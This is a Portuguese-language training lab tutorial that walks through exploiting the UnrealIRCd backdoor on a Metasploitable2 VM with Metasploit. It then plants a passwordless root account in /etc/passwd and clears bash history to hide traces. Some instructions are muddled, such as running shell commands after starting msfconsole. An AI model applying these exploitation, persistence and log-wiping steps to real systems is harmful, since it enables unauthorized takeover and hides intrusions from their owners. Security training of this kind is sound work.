Introdução
Neste laboratório, aprenderemos como criar um backdoor (porta dos fundos) e limpar rastros após obter acesso com sucesso a uma máquina alvo através de um ataque de penetração. O cenário é configurado no ambiente LabEx, onde usaremos o terminal Kali para explorar vulnerabilidades na máquina alvo Metasploitable2, obter acesso root, criar um backdoor para acesso futuro e limpar quaisquer rastros deixados durante o processo de ataque.
Obter Acesso Root na Máquina Alvo
Nesta etapa, usaremos a vulnerabilidade Unreal Ircd para obter acesso root na máquina alvo.
Agora você iniciará a máquina de ataque (container Kali Linux) e a máquina alvo (máquina virtual Metasploitable2) para o experimento.
- Abra um terminal xfce na máquina host LabEx e inicie o alvo Metasploitable2 executando o seguinte comando:
sudo virsh start Metasploitable2
Aguarde o início da máquina alvo, pode levar de 1 a 3 minutos.
- Teste a conectividade com a máquina alvo fazendo ping nela:
ping 192.168.122.102
Pressione Ctrl+C para parar o ping.
- Inicie o container Kali Linux e entre no ambiente bash executando:
docker run -ti --network host b5b709a49cd5 bash
- Dentro do container Kali, teste a conexão de rede com a máquina alvo:
ping 192.168.122.102
Pressione Ctrl+C para parar o ping.
Agora, tanto a máquina de ataque quanto a máquina alvo estão em execução, e você pode iniciar o teste de penetração.
Observação: Se você sair acidentalmente do bash atual, o container Kali parará automaticamente. Você pode executar docker run -ti --network host b5b709a49cd5 bash novamente no host para iniciar um novo container Kali e entrar no bash para continuar o experimento.
- No container Kali Linux, insira os seguintes comandos no terminal bash do Kali Linux:
service postgresql start
msfdb init
cd ~
msfconsole
Isso iniciará o serviço de banco de dados PostgreSQL, inicializará o banco de dados e iniciará o Metasploit Framework Console (msfconsole) para operações adicionais.
- Pesquise o módulo de vulnerabilidade Unreal Ircd:
search unreal_ircd
- Use o módulo
unix/irc/unreal_ircd_3281_backdoor:
use exploit/unix/irc/unreal_ircd_3281_backdoor
- Defina o endereço IP do alvo:
set RHOST 192.168.122.102
- Exploit a vulnerabilidade para obter acesso:
exploit
- Verifique o usuário atual:
whoami
Você deve ver que obteve acesso root na máquina alvo.
Pressione Ctrl+D para sair do console Metasploit e, em seguida, iniciar a inspeção
Criar um Backdoor
Agora que obtivemos acesso root, vamos criar um backdoor para acesso futuro à máquina alvo.
Primeiramente, se você não estiver no console Metasploit, você deve iniciar o console Metasploit:
cd ~
msfconsole
Em seguida, verifique as informações do sistema:
uname -a
Encontre a localização do bash do usuário root:
cat /etc/passwd
Crie uma conta backdoor sem senha:
echo 'shiyanlou1234::0:0::/:/bin/sh' >> /etc/passwd
Verifique a criação da conta backdoor:
cat /etc/passwd
Você deve ver a nova conta shiyanlou1234 na saída.
Abra um novo terminal e conecte-se à máquina alvo usando a conta backdoor:
telnet 192.168.122.102
Insira o nome de usuário shiyanlou1234 quando solicitado.
Verifique o usuário atual:
whoami
Você deve ver que está logado como o usuário backdoor.
Pressione Ctrl+D para sair do console Metasploit e, em seguida, iniciar a inspeção
Apagar Rastros
Após obter acesso e criar um backdoor, é importante limpar quaisquer rastros deixados durante o processo de ataque para evitar a detecção.
Primeiramente, se você não estiver no console Metasploit, você deve iniciar o console Metasploit:
cd ~
msfconsole
Uma maneira comum de limpar rastros é remover o histórico de comandos. O histórico é armazenado no arquivo .bash_history. Você pode limpar o histórico usando o seguinte comando:
history -c
Para limpar o arquivo .bash_history, você pode encontrar sua localização usando o comando find:
find / -name .bash_history
Pressione Ctrl+D para sair do console Metasploit e, em seguida, iniciar a inspeção
Resumo
Neste laboratório, aprendemos como obter acesso root em uma máquina alvo usando a vulnerabilidade Unreal Ircd, criar uma conta backdoor para acesso futuro e limpar os rastros deixados durante o processo de ataque. Essa experiência prática o ajudará a entender as técnicas usadas por invasores para manter acesso persistente e encobrir seus rastros após um ataque de penetração bem-sucedido.